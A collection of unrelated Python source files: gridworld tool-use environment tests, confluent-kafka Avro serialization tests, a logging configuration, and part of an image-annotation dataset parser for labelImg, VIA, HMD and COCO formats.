self.assertNoTransition(env, ll, render=self._render)
self.assertTransition(env, lr, render=self._render)
env = TestEnv(
art=[
' ',
' ',
' ',
' ',
' mmmm ',
' u n ',
' u n ',
' wwwwa ',
' ',
' ',
' ',
' ',
],
tool_position=(4, 9),
tool_size=4,
tool_direction=0,
food_position=(4 + 1, 4 + 1))
self.assertTransition(env, ru, render=self._render)
self.assertTransition(env, rd, render=self._render)
self.assertNoTransition(env, rl, render=self._render)
self.assertTransition(env, rr, render=self._render)
def testActionsWithToolImpassableTubeUp(self):
env = TestEnv(
art=[
' ',
' ',
' ',
' ',
' mmmm ',
' u n ',
' u n ',
' wwww ',
' a ',
' ',
' ',
' ',
],
tool_position=(4, 7),
tool_size=4,
tool_direction=0,
food_position=(4 + 1, 4 + 1))
self.assertNoTransition(env, uu, render=self._render)
self.assertTransition(env, ud, render=self._render)
self.assertTransition(env, ul, render=self._render)
self.assertTransition(env, ur, render=self._render)
env = TestEnv(
art=[
' ',
' ',
' mmmm ',
' u n ',
' u n ',
' wwww ',
' a ',
' ',
' ',
' ',
' ',
' ',
],
tool_position=(7, 7),
tool_size=4,
tool_direction=0,
food_position=(4, 4 + 1))
self.assertNoTransition(env, du, render=self._render)
self.assertTransition(env, dd, render=self._render)
self.assertTransition(env, dl, render=self._render)
self.assertTransition(env, dr, render=self._render)
env = TestEnv(
art=[
' ',
' ',
' ',
' ',
' mmmm ',
' u n ',
' u n ',
' wwww ',
' a ',
' ',
' ',
' ',
],
tool_position=(5, 6),
tool_size=4,
tool_direction=0,
food_position=(4 + 1, 3))
self.assertNoTransition(env, lu, render=self._render)
self.assertTransition(env, ld, render=self._render)
self.assertTransition(env, ll, render=self._render)
self.assertTransition(env, lr, render=self._render)
env = TestEnv(
art=[
' ',
' ',
' ',
' ',
' mmmm ',
' u n ',
' u n ',
' wwww ',
' a ',
' ',
' ',
' ',
],
tool_position=(5, 8),
tool_size=4,
tool_direction=0,
food_position=(4 + 1, 4 + 1))
self.assertNoTransition(env, ru, render=self._render)
self.assertTransition(env, rd, render=self._render)
self.assertTransition(env, rl, render=self._render)
self.assertTransition(env, rr, render=self._render)
def testActionsWithToolImpassableTubeDown(self):
env = TestEnv(
art=[
' ',
' ',
' ',
' ',
' ',
' a ',
' mmmm ',
' u n ',
' u n ',
' wwww ',
' ',
' ',
],
tool_position=(1, 7),
tool_size=4,
tool_direction=0,
food_position=(7, 4 + 1))
self.assertTransition(env, uu, render=self._render)
self.assertNoTransition(env, ud, render=self._render)
self.assertTransition(env, ul, render=self._render)
self.assertTransition(env, ur, render=self._render)
env = TestEnv(
art=[
' ',
' ',
' ',
' a ',
' mmmm ',
' u n ',
' u n ',
' wwww ',
' ',
' ',
' ',
' ',
],
tool_position=(4, 7),
tool_size=4,
tool_direction=0,
food_position=(4 + 1, 4 + 1))
self.assertTransition(env, du, render=self._render)
self.assertNoTransition(env, dd, render=self._render)
self.assertTransition(env, dl, render=self._render)
self.assertTransition(env, dr, render=self._render)
env = TestEnv(
art=[
' ',
' ',
' ',
' a ',
' mmmm ',
' u n ',
' u n ',
' wwww ',
' ',
' ',
' ',
' ',
],
tool_position=(3, 6),
tool_size=4,
tool_direction=0,
food_position=(4 + 1, 3))
self.assertTransition(env, lu, render=self._render)
self.assertNoTransition(env, ld, render=self._render)
self.assertTransition(env, ll, render=self._render)
self.assertTransition(env, lr, render=self._render)
env = TestEnv(
art=[
' ',
' ',
' ',
' a ',
' mmmm ',
' u n ',
' u n ',
' wwww ',
' ',
' ',
' ',
' ',
],
tool_position=(3, 8),
tool_size=4,
tool_direction=0,
food_position=(4 + 1, 4 + 1))
self.assertTransition(env, ru, render=self._render)
self.assertNoTransition(env, rd, render=self._render)
self.assertTransition(env, rl, render=self._render)
self.assertTransition(env, rr, render=self._render)
def testActionsWithToolBoundariesLeft(self):
env = TestEnv(
art=[
' ',
' ',
' ',
' ',
' mmmm ',
'a u n ',
' u n ',
' wwww ',
' ',
' ',
' ',
' ',
],
tool_position=(1, 0),
tool_size=4,
tool_direction=0,
food_position=(4 + 1, 4 + 1))
self.assertTransition(env, uu, render=self._render)
self.assertTransition(env, ud, render=self._render)
self.assertNoTransition(env, ul, render=self._render)
self.assertTransition(env, ur, render=self._render)
env = TestEnv(
art=[
' ',
' ',
' ',
' ',
' mmmm ',
' u n ',
'a u n ',
' wwww ',
' ',
' ',
' ',
' ',
],
tool_position=(7, 0),
tool_size=4,
tool_direction=0,
food_position=(4 + 1, 4 + 1))
self.assertTransition(env, du, render=self._render)
self.assertTransition(env, dd, render=self._render)
self.assertNoTransition(env, dl, render=self._render)
self.assertTransition(env, dr, render=self._render)
env = TestEnv(
art=[
' ',
' ',
' ',
' ',
' mmmm ',
' u n ',
' a u n ',
' wwww ',
' ',
' ',
' ',
' ',
],
tool_position=(6, 0),
tool_size=4,
tool_direction=0,
food_position=(4 + 1, 4 + 1))
self.assertTransition(env, lu, render=self._render)
self.assertTransition(env, ld, render=self._render)
self.assertNoTransition(env, ll, render=self._render)
self.assertTransition(env, lr, render=self._render)
env = TestEnv(
art=[
' ',
' ',
' ',
' ',
' mmmm ',
' u n ',
'a u n ',
' wwww ',
' ',
' ',
' ',
' ',
],
tool_position=(6, 1),
tool_size=4,
tool_direction=0,
food_position=(4 + 1, 4 + 1))
self.assertTransition(env, ru, render=self._render)
self.assertTransition(env, rd, render=self._render)
self.assertNoTransition(env, rl, render=self._render)
self.assertTransition(env, rr, render=self._render)
def testActionsWithToolBoundariesUp(self):
env = TestEnv(
art=[
' ',
' ',
' ',
' ',
' a mmmm ',
' u n ',
' u n ',
' wwww ',
' ',
' ',
' ',
' ',
],
tool_position=(0, 1),
tool_size=4,
tool_direction=0,
food_position=(4 + 1, 4 + 1))
self.assertNoTransition(env, uu, render=self._render)
self.assertTransition(env, ud, render=self._render)
self.assertTransition(env, ul, render=self._render)
self.assertTransition(env, ur, render=self._render)
env = TestEnv(
art=[
' a ',
' ',
' ',
' ',
' mmmm ',
' u n ',
' u n ',
' wwww ',
' ',
' ',
' ',
' ',
],
tool_position=(1, 1),
tool_size=4,
tool_direction=0,
food_position=(4 + 1, 4 + 1))
self.assertNoTransition(env, du, render=self._render)
self.assertTransition(env, dd, render=self._render)
self.assertTransition(env, dl, render=self._render)
self.assertTransition(env, dr, render=self._render)
env = TestEnv(
art=[
' a ',
' ',
' ',
' ',
' mmmm ',
' u n ',
' u n ',
' wwww ',
' ',
' ',
' ',
' ',
],
tool_position=(0, 1),
tool_size=4,
tool_direction=0,
food_position=(4 + 1, 4 + 1))
self.assertNoTransition(env, lu, render=self._render)
self.assertTransition(env, ld, render=self._render)
self.assertTransition(env, ll, render=self._render)
self.assertTransition(env, lr, render=self._render)
env = TestEnv(
art=[
' a ',
' ',
' ',
' ',
' mmmm ',
' u n ',
' u n ',
' wwww ',
' ',
' ',
' ',
' ',
],
tool_position=(0, 2),
tool_size=4,
tool_direction=0,
food_position=(4 + 1, 4 + 1))
self.assertNoTransition(env, ru, render=self._render)
self.assertTransition(env, rd, render=self._render)
self.assertTransition(env, rl, render=self._render)
self.assertTransition(env, rr, render=self._render)
def testActionsWithToolBoundariesDown(self):
env = TestEnv(
art=[
' ',
' ',
' ',
' ',
' mmmm ',
' u n ',
' u n ',
' wwww ',
' ',
' ',
' ',
' a ',
],
tool_position=(7, 1),
tool_size=4,
tool_direction=0,
food_position=(4 + 1, 4 + 1))
self.assertTransition(env, uu, render=self._render)
self.assertNoTransition(env, ud, render=self._render)
self.assertTransition(env, ul, render=self._render)
self.assertTransition(env, ur, render=self._render)
env = TestEnv(
art=[
' ',
' ',
' ',
' ',
' mmmm ',
' u n ',
' u n ',
' a wwww ',
' ',
' ',
' ',
' ',
],
tool_position=(8, 1),
tool_size=4,
tool_direction=0,
food_position=(4 + 1, 4 + 1))
self.assertTransition(env, du, render=self._render)
self.assertNoTransition(env, dd, render=self._render)
self.assertTransition(env, dl, render=self._render)
self.assertTransition(env, dr, render=self._render)
env = TestEnv(
art=[
' ',
' ',
' ',
' ',
' mmmm ',
' u n ',
' u n ',
' wwww ',
' a ',
' ',
' ',
' ',
],
tool_position=(8, 1),
tool_size=4,
tool_direction=0,
food_position=(4 + 1, 4 + 1))
self.assertTransition(env, lu, render=self._render)
self.assertNoTransition(env, ld, render=self._render)
self.assertTransition(env, ll, render=self._render)
self.assertTransition(env, lr, render=self._render)
env = TestEnv(
art=[
' ',
' ',
' ',
' ',
' mmmm ',
' u n ',
' u n ',
' wwww ',
' a ',
' ',
' ',
' ',
],
tool_position=(8, 2),
tool_size=4,
tool_direction=0,
food_position=(4 + 1, 4 + 1))
self.assertTransition(env, ru, render=self._render)
self.assertNoTransition(env, rd, render=self._render)
self.assertTransition(env, rl, render=self._render)
self.assertTransition(env, rr, render=self._render)
def testActionsWithToolBoundariesRight(self):
env = TestEnv(
art=[
' ',
' ',
' ',
' ',
' mmmm ',
' u n a',
' u n ',
' wwww ',
' ',
' ',
' ',
' ',
],
tool_position=(1, 11),
tool_size=4,
tool_direction=0,
food_position=(4 + 1, 4 + 1))
self.assertTransition(env, uu, render=self._render)
self.assertTransition(env, ud, render=self._render)
self.assertTransition(env, ul, render=self._render)
self.assertNoTransition(env, ur, render=self._render)
env = TestEnv(
art=[
' ',
' ',
' ',
' ',
' mmmm ',
' u n a',
' u n ',
' wwww ',
' ',
' ',
' ',
' ',
],
tool_position=(6, 11),
tool_size=4,
tool_direction=0,
food_position=(4 + 1, 4 + 1))
self.assertTransition(env, du, render=self._render)
self.assertTransition(env, dd, render=self._render)
self.assertTransition(env, dl, render=self._render)
self.assertNoTransition(env, dr, render=self._render)
env = TestEnv(
art=[
' ',
' ',
' ',
' ',
' mmmm ',
' u n a',
' u n ',
' wwww ',
' ',
' ',
' ',
' ',
],
tool_position=(5, 10),
tool_size=4,
tool_direction=0,
food_position=(4 + 1, 4 + 1))
self.assertTransition(env, lu, render=self._render)
self.assertTransition(env, ld, render=self._render)
self.assertTransition(env, ll, render=self._render)
self.assertNoTransition(env, lr, render=self._render)
env = TestEnv(
art=[
' ',
' ',
' ',
' ',
' mmmm ',
' u n a ',
' u n ',
' wwww ',
' ',
' ',
' ',
' ',
],
tool_position=(5, 11),
tool_size=4,
tool_direction=0,
food_position=(4 + 1, 4 + 1))
self.assertTransition(env, ru, render=self._render)
self.assertTransition(env, rd, render=self._render)
self.assertTransition(env, rl, render=self._render)
self.assertNoTransition(env, rr, render=self._render)
def testActionsWithToolFoodTrap(self):
env = TestEnv(
art=[
' ',
' ',
' ',
' ',
' mmmm ',
' u n ',
' u n ',
' wwww ',
' a ',
' ',
' ',
' ',
],
tool_position=(5, 6),
tool_size=4,
tool_direction=0,
food_position=(5, 5))
self.assertNoTransition(env, ll, render=self._render)
def testActionsWithToolFoodTube(self):
env = TestEnv(
art=[
' ',
' ',
' ',
' ',
' mmmm ',
' u n ',
' u n ',
' wwww ',
' ',
' a ',
' ',
' ',
],
tool_position=(6, 5),
tool_size=4,
tool_direction=0,
food_position=(5, 5))
self.assertNoTransition(env, lu, render=self._render)
def testActionsTube(self):
env = TestEnv(
art=[
' ',
' ',
' ',
' a ',
' mmmm ',
' u n ',
' u n ',
' wwww ',
' ',
' ',
' ',
' ',
],
tool_position=(0, 0),
tool_size=4,
tool_direction=0,
food_position=(5, 5))
self.assertNoTransition(env, dd, render=self._render)
def testActionsExit(self):
env = TestEnv(
art=[
' ',
' ',
' ',
' ',
' mmmm ',
' u na ',
' u n ',
' wwww ',
' ',
' ',
' ',
' ',
],
tool_position=(0, 0),
tool_size=4,
tool_direction=0,
food_position=(5, 5))
self.assertNoTransition(env, ll, render=self._render)
def testActionsTrap(self):
env = TestEnv(
art=[
' ',
' ',
' ',
' ',
' mmmm ',
' au n ',
' u n ',
' wwww ',
' ',
' ',
' ',
' ',
],
tool_position=(0, 0),
tool_size=4,
tool_direction=0,
food_position=(5, 5))
self.assertNoTransition(env, rr, render=self._render)
def testActionsTool(self):
env = TestEnv(
art=[
' a ',
' ',
' ',
' ',
' mmmm ',
' u n ',
' u n ',
' wwww ',
' ',
' ',
' ',
' ',
],
tool_position=(0, 0),
tool_size=4,
tool_direction=0,
food_position=(5, 5))
self.assertTransition(env, rr, render=self._render)
def testActionsWithToolFoodExit(self):
env = TestEnv(
art=[
' ',
' ',
' ',
' ',
' mmmm ',
' u n ',
' u n ',
' wwww ',
' a ',
' ',
' ',
' ',
],
tool_position=(5, 5),
tool_size=4,
tool_direction=0,
food_position=(5, 6))
self.assertTransition(env, rr, render=self._render)
env = TestEnv(
art=[
' ',
' ',
' ',
' ',
' mmmm ',
' u n ',
' u n ',
' wwww ',
' a ',
' ',
' ',
' ',
],
tool_position=(5, 6),
tool_size=4,
tool_direction=0,
food_position=(5, 7))
self.assertTransition(env, rr, render=self._render)
env = TestEnv(
art=[
' ',
' ',
' ',
' ',
' mmmm ',
' u n ',
' u n ',
' wwww ',
' a ',
' ',
' ',
' ',
],
tool_position=(5, 8),
tool_size=4,
tool_direction=0,
food_position=(5, 7))
self.assertTransition(env, ll, render=self._render)
if __name__ == '__main__':
absltest.main()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2020 Confluent Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import pytest
from confluent_kafka import TopicPartition
from confluent_kafka.serialization import (MessageField,
SerializationContext)
from confluent_kafka.schema_registry.avro import (AvroSerializer,
AvroDeserializer)
class User(object):
schema_str = """
{
"namespace": "confluent.io.examples.serialization.avro",
"name": "User",
"type": "record",
"fields": [
{"name": "name", "type": "string"},
{"name": "favorite_number", "type": "int"},
{"name": "favorite_color", "type": "string"}
]
}
"""
def __init__(self, name, favorite_number, favorite_color):
self.name = name
self.favorite_number = favorite_number
self.favorite_color = favorite_color
def __eq__(self, other):
return all([
self.name == other.name,
self.favorite_number == other.favorite_number,
self.favorite_color == other.favorite_color])
@pytest.mark.parametrize("avsc, data, record_type",
[('basic_schema.avsc', {'name': 'abc'}, "record"),
('primitive_string.avsc', u'Jรคmtland', "string"),
('primitive_bool.avsc', True, "bool"),
('primitive_float.avsc', 32768.2342, "float"),
('primitive_double.avsc', 68.032768, "float")])
def test_avro_record_serialization(kafka_cluster, load_file, avsc, data, record_type):
"""
Tests basic Avro serializer functionality
Args:
kafka_cluster (KafkaClusterFixture): cluster fixture
load_file (callable(str)): Avro file reader
avsc (str) avsc: Avro schema file
data (object): data to be serialized
"""
topic = kafka_cluster.create_topic("serialization-avro")
sr = kafka_cluster.schema_registry()
schema_str = load_file(avsc)
value_serializer = AvroSerializer(sr, schema_str)
value_deserializer = AvroDeserializer(sr)
producer = kafka_cluster.producer(value_serializer=value_serializer)
producer.produce(topic, value=data, partition=0)
producer.flush()
consumer = kafka_cluster.consumer(value_deserializer=value_deserializer)
consumer.assign([TopicPartition(topic, 0)])
msg = consumer.poll()
actual = msg.value()
if record_type == 'record':
assert [v == actual[k] for k, v in data.items()]
elif record_type == 'float':
assert data == pytest.approx(actual)
else:
assert actual == data
@pytest.mark.parametrize("avsc, data,record_type",
[('basic_schema.avsc', dict(name='abc'), 'record'),
('primitive_string.avsc', u'Jรคmtland', 'string'),
('primitive_bool.avsc', True, 'bool'),
('primitive_float.avsc', 768.2340, 'float'),
('primitive_double.avsc', 6.868, 'float')])
def test_delivery_report_serialization(kafka_cluster, load_file, avsc, data, record_type):
"""
Tests basic Avro serializer functionality
Args:
kafka_cluster (KafkaClusterFixture): cluster fixture
load_file (callable(str)): Avro file reader
avsc (str) avsc: Avro schema file
data (object): data to be serialized
"""
topic = kafka_cluster.create_topic("serialization-avro-dr")
sr = kafka_cluster.schema_registry()
schema_str = load_file(avsc)
value_serializer = AvroSerializer(sr, schema_str)
value_deserializer = AvroDeserializer(sr)
producer = kafka_cluster.producer(value_serializer=value_serializer)
def assert_cb(err, msg):
actual = value_deserializer(msg.value(),
SerializationContext(topic, MessageField.VALUE, msg.headers()))
if record_type == "record":
assert [v == actual[k] for k, v in data.items()]
elif record_type == 'float':
assert data == pytest.approx(actual)
else:
assert actual == data
producer.produce(topic, value=data, partition=0, on_delivery=assert_cb)
producer.flush()
consumer = kafka_cluster.consumer(value_deserializer=value_deserializer)
consumer.assign([TopicPartition(topic, 0)])
msg = consumer.poll()
actual = msg.value()
# schema may include default which need not exist in the original
if record_type == 'record':
assert [v == actual[k] for k, v in data.items()]
elif record_type == 'float':
assert data == pytest.approx(actual)
else:
assert actual == data
def test_avro_record_serialization_custom(kafka_cluster):
"""
Tests basic Avro serializer to_dict and from_dict object hook functionality.
Args:
kafka_cluster (KafkaClusterFixture): cluster fixture
"""
topic = kafka_cluster.create_topic("serialization-avro")
sr = kafka_cluster.schema_registry()
user = User('Bowie', 47, 'purple')
value_serializer = AvroSerializer(sr, User.schema_str,
lambda user, ctx:
dict(name=user.name,
favorite_number=user.favorite_number,
favorite_color=user.favorite_color))
value_deserializer = AvroDeserializer(sr, User.schema_str,
lambda user_dict, ctx:
User(**user_dict))
producer = kafka_cluster.producer(value_serializer=value_serializer)
producer.produce(topic, value=user, partition=0)
producer.flush()
consumer = kafka_cluster.consumer(value_deserializer=value_deserializer)
consumer.assign([TopicPartition(topic, 0)])
msg = consumer.poll()
user2 = msg.value()
assert user2 == user
|
import logging
import sys
_formatter = logging.Formatter(fmt="[%(asctime)s] [%(process)d] [%(levelname)s] [%(pathname)s:%(lineno)d]: %(message)s")
_ch = logging.StreamHandler(sys.stdout)
_ch.setLevel(logging.DEBUG)
_ch.setFormatter(_formatter)
# _fh = logging.FileHandler("mylog.log", "w")
# _fh.setLevel(logging.DEBUG)
# _fh.setFormatter(_formatter)
logger = logging.getLogger('scylla')
logger.setLevel(logging.DEBUG)
logger.addHandler(_ch)
# logger.addHandler(_fh)
|
__author__ = 'mangalbhaskar'
__version__ = '1.0'
"""
Generic Annotation Dataset Parser
------------------------------------------------------------
Copyright (c) 2020 mangalbhaskar
Licensed under [see LICENSE for details]
Written by mangalbhaskar
------------------------------------------------------------
"""
import os
import numpy as np
import skimage.io
import skimage.draw
import json
import sys
import logging
this_dir = os.path.dirname(__file__)
if this_dir not in sys.path:
sys.path.append(this_dir)
APP_ROOT_DIR = os.getenv('AI_APP')
ROOT_DIR = os.getenv('AI_HOME')
BASE_PATH_CFG = os.getenv('AI_CFG')
if APP_ROOT_DIR not in sys.path:
sys.path.append(APP_ROOT_DIR)
if BASE_PATH_CFG not in sys.path:
sys.path.append(BASE_PATH_CFG)
## custom imports
import common
import apputil
from Base import Dataset
from annon.dataset.Annon import ANNON
log = logging.getLogger('__main__.'+__name__)
class AnnonDataset(Dataset):
name = ""
# num_classes = 0
annon_type = ""
pyclassid = None
annon = None
def __init__(self, name=None):
self.pyclassid = self.__class__
super(self.__class__, self).__init__()
self.name = name
def add_class(self, source, idx, class_name, lbl_id=None, color=None):
super(self.__class__, self).add_class(source, idx, class_name, lbl_id, color)
return
def add_image(self, source, image_id, path, **kwargs):
super(self.__class__, self).add_image(source, image_id, path, **kwargs)
return
def get_classid_from_source_class_name(self, source_class_name):
class_id = self.classname_from_sourcename_map[source_class_name]
if not class_id:
class_id = super(self.__class__, self).get_classid_from_source_class_name(source_class_name)
return class_id
def get_classid_from_source_class_id(self, source_class_id):
log.info("source_class_id: {}".format(source_class_id))
class_id = self.class_from_source_map[source_class_id]
if not class_id:
class_id = super(self.__class__, self).get_classid_from_source_class_id(source_class_id)
return class_id
def get_classname_from_source_class_id(self, source_class_id):
class_name = self.classname_from_source_map[source_class_id]
if not class_name:
class_name = super(self.__class__, self).get_classname_from_source_class_id(source_class_id)
return class_name
def load_data(self, appcfg, dbcfg, datacfg, subset):
"""
load the data based on the annotation type
"""
log.info("--------------------------------> {}".format(subset))
# if subset:
# splits = datacfg.splits
# # Train or validation or testing dataset?
# assert subset in splits
log.info("load_data:-----> {}".format(datacfg.name))
annon_type = datacfg.annon_type
fname = 'load'+'_'+annon_type
log.info("load_data::fname: {}".format(fname))
fn = getattr(self, fname)
## TBD: raise unknown error
if fn:
return fn(appcfg=appcfg, dbcfg=dbcfg, datacfg=datacfg, subset=subset)
else:
log.info("Unknown fn: {}".format(fname))
return
def load_labelImg(self, appcfg, dbcfg, datacfg, subset):
"""
labelImg specific CSV header:
,Image Server Path,Dest Path,Top,Left,Width,Height,Label
log.info("Top,Left,Width,Height,Label")
- assume data in csv file format
TODO:
- json file data loading
"""
log.info("AnnonDataset::load_labelImg::-------------------------------->")
annotation_filename = datacfg['annotations']
images_dir = datacfg['images']
log.info("annotation_filename: {}".format(annotation_filename))
log.info("images_dir: {}".format(images_dir))
annon_type = datacfg.annon_type
name = datacfg.name
fixed_lbl_id = datacfg.single_class if 'single_class' in datacfg else None
# class_ids = []
total_annotation = 0
total_img = 0
images = set()
class_labels = set()
data_read_threshold = datacfg.data_read_threshold if 'data_read_threshold' in datacfg else 0
log.info("data_read_threshold: {}".format(data_read_threshold))
## Add images
for line in common.read_csv_line(annotation_filename):
if data_read_threshold == total_img:
log.info("Threshold reached: total_img: {}".format(total_img))
break
image_name = line[1].split("\\")[-1]
# image_path = os.path.join(images_dir, image_name)
filepath = os.path.join(images_dir, image_name)
# image_path = apputil.get_abs_path(appcfg, img, 'AI_ANNON_DATA_HOME_LOCAL')
# filepath = os.path.join(image_path, filename)
# log.debug("filepath: {}".format(filepath))
if os.path.exists(filepath):
images.add(filepath)
lbl_id = line[-1]
lbl_id = fixed_lbl_id if fixed_lbl_id else lbl_id.lower().replace(' ','_')
attributes = {}
class_labels.add(lbl_id)
# log.info("lbl_id: {}".format(lbl_id))
if 'height' not in img or 'width' not in img:
im = skimage.io.imread(filepath)
height, width = im.shape[:2]
else:
height, width = img['height'], img['width']
# log.info("height, width: {} {}".format(height, width))
# log.info("{}, {}, {},{},{},{},{}".format(image_name, line[-6], line[-5], line[-4], line[-3], line[-2], line[-1]))
# count += 1
## top(y), left(x), height, width
annotations = [int(line[-5]), int(line[-4]), int(line[-2]), int(line[-3])]
# log.info("bbox: {}".format(annotations))
total_annotation += 1
attributes['lbl_id'] = lbl_id
self.add_image(
name,
image_id=name+'-'+image_name, # use file name as a unique image id
path=filepath,
width=width,
height=height,
annon_type=annon_type,
annotations=annotations,
attributes=attributes)
total_img = len(images)
total_classes = len(class_labels)
# for index, class_name in enumerate(class_ids):
for index, class_name in enumerate(list(class_labels)):
class_id = index+1
log.info("name, class_id ,class_name: {},{},{}".format(name, class_id, class_name))
## "source_name", "id", "name"
self.add_class(name, class_id, class_name)
log.info("Total Images: {}".format(total_img))
log.info("Total Annotations: {}".format(total_annotation))
log.info("Total Classes: {}".format(total_classes))
log.info("Class Labels, Total class_labels: {}".format(class_labels, len(class_labels)))
log.info("-------")
return total_img, total_annotation, total_classes
def load_via(self, appcfg, dbcfg, datacfg, subset):
"""
Load dataset
VGG Image Annotator (up to version 1.6) saves each image in the form:
{ 'filename': '28503151_5b5b7ec140_b.jpg',
'regions': {
'0': {
'region_attributes': {},
'shape_attributes': {
'all_points_x': [...],
'all_points_y': [...],
'name': 'polygon'}},
... more regions ...
},
'size': 100202
}
We mostly care about the x and y coordinates of each region
Note: In VIA 2.0, regions was changed from a dict to a list.
- assume default file extension is json
TODO:
- csv file loading
"""
log.info("AnnonDataset::load_json_via::-------------------------------->")
annotation_filename = datacfg['ANNOTATIONS']
images_dir = datacfg['IMAGES']
log.info("annotation_filename: {}".format(annotation_filename))
log.info("images_dir: {}".format(images_dir))
annon_type = datacfg.annon_type
name = datacfg.name
fixed_lbl_id = datacfg.single_class if 'SINGLE_CLASS' in datacfg else None
# class_ids = []
with open(annotation_filename,'r') as fr:
dataset = json.load(fr)
dataset = list(dataset.values()) # don't need the dict keys
# log.info("dataset: {}".format(dataset))
# The VIA tool saves images in the JSON even if they don't have any
# dataset. Skip unannotated images.
dataset = [a for a in dataset if a['regions']]
total_annotation = 0
total_img = 0
class_labels = set()
data_read_threshold = datacfg.data_read_threshold if 'data_read_threshold' in datacfg else 0
log.info("data_read_threshold: {}".format(data_read_threshold))
## Add images
for i, a in enumerate(dataset):
if data_read_threshold == i:
log.info("Threshold reached: i: {}".format(i))
break
# Get the x, y coordinaets of points of the polygons that make up
# the outline of each object instance. These are stores in the
# shape_attributes (see json format above)
# The if condition is needed to support VIA versions 1.x and 2.x.
if type(a['regions']) is dict:
annotations = [r['shape_attributes'] for r in a['regions'].values()]
attributes = [r['region_attributes'] for r in a['regions'].values()]
else:
annotations = [r['shape_attributes'] for r in a['regions']]
attributes = [r['region_attributes'] for r in a['regions']]
# log.info("attributes: {}".format(attributes))
# log.info("annotations, len(annotations): {},{}".format(annotations, len(annotations)))
# load_mask() needs the image size to convert polygons to masks.
# Unfortunately, VIA doesn't include it in JSON, so we must read
# the image. This is only managable since the dataset is tiny.
image_name = a['filename']
# image_path = os.path.join(images_dir, a['filename'])
filepath = os.path.join(images_dir, a['filename'])
# image_path = apputil.get_abs_path(datacfg, img, 'AI_ANNON_DATA_HOME_LOCAL')
# filepath = os.path.join(image_path, filename)
# log.debug("filepath: {}".format(filepath))
total_annotation_per_img = len(annotations)
# log.info("{}: {}".format(image_name, total_annotation_per_img))
for j in range(0, len(annotations)):
if attributes[j] == {}:
attributes[j]['lbl_id'] = fixed_lbl_id
class_labels.add(fixed_lbl_id)
elif 'lbl_id' in attributes[j]:
class_labels.add(attributes[j]['lbl_id'])
total_annotation += total_annotation_per_img
## TBD: width and height from a['file_attributes']['width'], a['file_attributes']['height']
if os.path.exists(filepath):
if 'height' not in img or 'width' not in img:
im = skimage.io.imread(filepath)
height, width = im.shape[:2]
else:
height, width = img['height'], img['width']
self.add_image(
name,
image_id=name+'-'+image_name, # use file name as a unique image id
path=filepath,
width=width,
height=height,
annon_type=annon_type,
annotations=annotations,
attributes=attributes)
total_img = len(dataset)
total_classes = len(class_labels)
for index, class_name in enumerate(class_labels):
class_id = index+1
log.info("name, index, class_name: {}, {}, {}".format(name, class_id, class_name))
## "source_name", "id", "name"
self.add_class(name, class_id, class_name)
# self.add_class(name, class_name, class_name)
log.info("Total Images: {}".format(total_img))
log.info("Total Annotations: {}".format(total_annotation))
log.info("Total Classes: {}".format(total_classes))
log.info("Class Labels, Total class_labels: {}".format(class_labels, len(class_labels)))
log.info("-------")
return total_img, total_annotation, total_classes
def load_hmd(self, appcfg, dbcfg, datacfg, subset):
"""
- assume default file extension is json
TODO:
- csv file loading
"""
log.info("-------------------------------->")
log.debug("datacfg: {}".format(datacfg))
class_ids = datacfg.class_ids if 'class_ids' in datacfg and datacfg['class_ids'] else []
annon_type = datacfg.annon_type
name = datacfg.name
# class_map = datacfg.class_map if datacfg.class_map else None
annon = self.annon = ANNON(dbcfg, datacfg, subset=subset)
class_ids = annon.getCatIds(catIds=class_ids)
image_ids = annon.getImgIds(catIds=class_ids)
# log.debug("subset, image_ids: {}, {}".format(subset, image_ids))
log.debug("subset, class_ids: {}, {}".format(subset, class_ids))
## Add images
total_annotation = 0
total_maskarea = 0
total_bboxarea = 0
data_read_threshold = datacfg.data_read_threshold if 'data_read_threshold' in datacfg else -1
log.debug("data_read_threshold: {}".format(data_read_threshold))
images = annon.loadImgs(ids=image_ids)
for i, img in enumerate(images):
if data_read_threshold == i:
log.info("Threshold reached: i: {}".format(i))
break
# log.debug("img: {}".format(img))
image_path = apputil.get_abs_path(appcfg, img, 'AI_ANNON_DATA_HOME_LOCAL')
filepath = os.path.join(image_path, img['filename'])
# log.debug("filepath: {}".format(filepath))
## TBD: width and height from a['file_attributes']['width'], a['file_attributes']['height']
if os.path.exists(filepath):
try:
##log.info("Image file: {}".format(filepath))
if 'height' not in img or 'width' not in img:
im = skimage.io.imread(filepath)
height, width = im.shape[:2]
else:
height, width = img['height'], img['width']
# width = annon.imgs[i]["width"]
# height = annon.imgs[i]["height"]
img_id = img['img_id']
annotations = annon.loadAnns(annon.getAnnIds(imgIds=[img_id], catIds=class_ids))
total_annotation += len(annotations)
self.add_image(
name,
image_id=name+'-'+str(img_id),
path=filepath,
width=width,
height=height,
annon_type=annon_type,
annotations=annotations)
except:
log.info("Error Reading file or adding annotation: {}".format(filepath))
log.error("Exception occurred", exc_info=True)
else:
log.info("file does not exists: {}".format(filepath))
total_img = len(image_ids)
total_classes = len(class_ids)
classinfo = annon.loadCats(ids=class_ids)
for index, ci in enumerate(classinfo):
class_idx = index+1
class_source, class_lbl_id, class_name = ci['source'], ci['lbl_id'], ci['name']
log.info("Adding: class_source, class_lbl_id, class_name, class_dx: {}, {}, {}".format(class_source, class_lbl_id, class_name, class_idx))
self.add_class(source=class_source, idx=class_idx, class_name=class_name, lbl_id=class_lbl_id, color=None)
log.info("Total Images: {}".format(total_img))
log.info("Total Annotations: {}".format(total_annotation))
log.info("Total Classes without BG: {}".format(total_classes))
log.info("Total Classes including BG: {}".format(len(self.classinfo)))
log.info("Classinfo: {}".format(self.classinfo))
log.info("-------")
return total_img, total_annotation, total_classes, annon
def load_json_coco(self, appcfg, dbcfg, datacfg, subset):
log.info("AnnonDataset::load_json_coco::-------------------------------->")
# log.info("AnnonDataset::datacfg: {}".format(datacfg))
import CocoDataset
dataclass = self
cocodataset = CocoDataset.CocoDataset("coco", dataclass)
self.cocodataset = cocodataset
total_img, total_annotation, total_classes = cocodataset.load_data(datacfg['SUBSET'], datacfg, datacfg['CLASS_IDS'], datacfg['CLASS_MAP'])
# log.info("Total Images: {}".format(total_img))
